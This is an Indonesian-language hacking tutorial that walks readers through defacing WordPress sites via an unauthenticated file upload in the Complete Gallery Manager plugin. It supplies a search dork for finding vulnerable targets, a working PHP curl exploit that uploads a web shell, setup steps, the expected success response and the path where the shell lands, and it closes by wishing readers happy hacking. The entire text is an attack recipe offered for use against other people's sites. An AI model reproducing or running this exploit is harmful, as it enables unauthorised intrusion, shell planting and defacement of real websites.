Deface Wordpress Dengan Teknik File Upload Shell

oke langsung aja ya.

1. Pertama kalian harus udah terinstall xampp / wamp.
2. Dork: inurl:/wp-content/plugins/complete-gallery-manager/
3. bikin exploitnya. format PHP, simpen di C:/xampp/php atau C:/wamp/bin/php/php5.4.3

Code:

<?php

$uploadfile="namashellkalian.php";

$ch = curl_init("http://target.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");

curl_setopt($ch, CURLOPT_POST, true);  

curl_setopt($ch, CURLOPT_POSTFIELDS,

        array('qqfile'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";



?>

Oh iya shell nya harus 1 folder sama exploit ini ya. jangan lupa target.com diganti urlnya.

4. Klik Start -> Run -> CMD
5. klik cd \xampp\php untuk xampp. atau cd \wamp\bin\php\php5.4.3 untuk wamp.
6. balik ke folder awal, kalian cari file php.ini, terus edit file nya pake notepad aja.
7. di file php.ini cari kata ;extension=php_curl.dll lalu hapus tanda ; nya. menjadi extension=php_curl.dll lalu save.
8. Kembali ke cmd, ketik php exploitnya.php klik enter
9. Jika muncul
{"success":true,"r_data":[{"name":"Full Size","url":"http:\/\/target
.com\/wp-content\/uploads\/2013\/10\/namashell.php","filename":"namashell","width":null,
"height":null}]}
Berarti sukses. tapi jika tidak muncul kode seperti itu berarti gagal.
10. Shell dapat diakses di http://target.com/wp-content/uploads/2013/10/shell.php
2013 itu tahun, 10 itu bulan.

Oke selamat hacking sodara sodara
kalo kurang jelas tanya aja lewat komentar